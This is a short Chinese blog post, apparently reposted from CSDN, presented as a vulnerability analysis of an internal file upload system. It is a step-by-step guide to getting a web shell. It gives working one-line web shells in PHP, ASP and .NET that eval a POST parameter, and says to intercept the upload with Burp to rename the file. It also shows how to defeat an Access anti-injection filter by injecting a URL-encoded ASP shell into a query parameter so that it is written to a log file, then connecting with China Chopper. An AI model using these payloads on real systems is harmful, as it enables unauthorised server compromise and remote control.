【Web】内部文件上传系统漏洞分析溯源(获取shell)

         【Web】内部文件上传系统漏洞分析溯源(获取shell)


【准备工具】

1.中国菜刀 (可以去官网下载)

官网:http://www.maicaidao.co/

      https://download.csdn.net/download/u014549283/10570976

2.BurpPro

3.火狐浏览器的FoxyProxy Standard插件

【技术要点】

1.新建一句话代码,比如1.txt,内容选择如下

PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

在实际使用过程中,替换PASS为链接的时候需要的密码。(pass是后面菜刀链接时候编辑框网址后面的内容)

2.截包,改上传文件名称,获取最后的路径

3.菜刀连接即可,注意其中的参数填写!

【access通用防注入】(asp为例)

1文件记录在sqlin.asp文件 中,我们在可注入的php的参数中 加上 

?id=1 and 1=<%eval request("pass")%>

发现无法记录,于是将一句话木马进行url编码

(在线URL编码 http://tool.oschina.net/encode?type=4)

即id=1 and 1=%3C%25eval%20request(%22pass%22)%25%3E

 记录成功,然后用菜刀连接sqlin.asp即可。

猜你喜欢

转载自blog.csdn.net/u014549283/article/details/81273004